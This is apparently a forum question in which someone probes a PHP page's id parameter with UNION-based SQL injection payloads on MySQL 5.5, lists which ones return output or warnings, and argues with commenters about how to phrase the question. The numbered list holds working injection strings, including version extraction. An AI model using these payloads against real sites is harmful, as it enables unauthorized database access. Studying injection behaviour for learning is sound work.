# SQL injection weird web app behaviour

Tags: sql-injection, mysql

I'm playing with SQL injection (for educational purpose only blah blah) and I got stuck on this weird (to me) web application behaviour:

I successfully injected the following payload

```
page.php?id=-1 union all select 1,2,3 -- -
```

and I can see the number `3` displayed on the page. Good. Then, I found the MySQL server version with

```
page.php?id=-1 union all select 1,2,@@version -- -
```

which outputs `5.5.54`. Now, I'd like to find the currently selected database, so I tried

```
page.php?id=-1 union all select 1,2,database() -- -
```

which gives the following warning without producing the expected output `Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ...`.

After hours of 'testing' I observed the following behaviours:

```
(1)
page.php?id=-1 union all select 1,2,@@version -- -
[works, output 5.5.54]

(2)
page.php?id=-1 union all select 1,2,version() -- -
[warning, no output]

(3)
page.php?id=-1 union all select 1,2,'a' -- -
[warning, no output]

(4)
page.php?id=-1 union all select 1,2,2*0.5 -- -
[works, output 1.0]

(5)
page.php?id=-1 union all select 1,2,2-0.5 -- -
[works, output 1.5]

(6)
page.php?id=-1 union all select 1,2,ascii('test') -- -
[warning, no output]

(7)
page.php?id=(select 1) -- -
[works exactly as id=1]

(8)
page.php?id=-1 union all select 1,2,(select 1) -- -
[warning, no output]

(9)
page.php?id=-1 union all select 1,2,select 1 -- -
[warning, no output]

(10)
page.php?id=-1 union all select 1,2,greatest(0,1) -- -
[warning, no output]

(11)
page.php?id=greatest(0, 1) -- -
[works exactly as id=1]
```

Furthermore, for each server system variable ([MySQL 5.7 Reference Manual - Server System Variables](https://dev.mysql.com/doc/refman/5.7/en/server-system-variables.html)) it works as expected.

I don't have a specific question but it seems to me that all these behaviours are not consistent (e.g., (1)-(2) or (9)-(10)-(11) or many others).

Comment: If you don't have a specific question then why're you posting here? What do you expect the community to help you with?

Comment: Are you serious? Not having a specific question doesn't mean not having a question. In the presented case, I don't have a specific **single** question but **many** more than one (e.g., why (1) works and (2) does not or why (4) and (5) works and (6) doesn't, ...). All these specific question are better summarised in the more general question "what could happen behind the scene that could produce all these behaviours?". This is exactly what I wrote on the last two lines.

Comment: I cannot see a question in the last 2 lines. There is an observation "these behaviours are not consistent". Anyway, the better you ask the better answers you'll get. I wouldn't leave it up to the reader to guess what exactly you're asking for. And admins frequently close questions because it is "unclear what you're asking".

Comment: Honestly, I can't see any significant difference in changing the last two lines in "don't you find these behaviours inconsistent?". How could it be interpreted otherwise?

Comment: Is "don't you find these inconsistent" really the question you want to ask here? My answer is "yes", does this help you? Don't you want to ask sth like "database() returns an object of type <whatever>, so does ascii('test'), why is the behaviour different"? In addition, what I'm missing is the php code that does the SQL query, that would definitely be helpful.

Comment: No, but how could I know that your answer was "yes"? Btw, I'm missing the code too...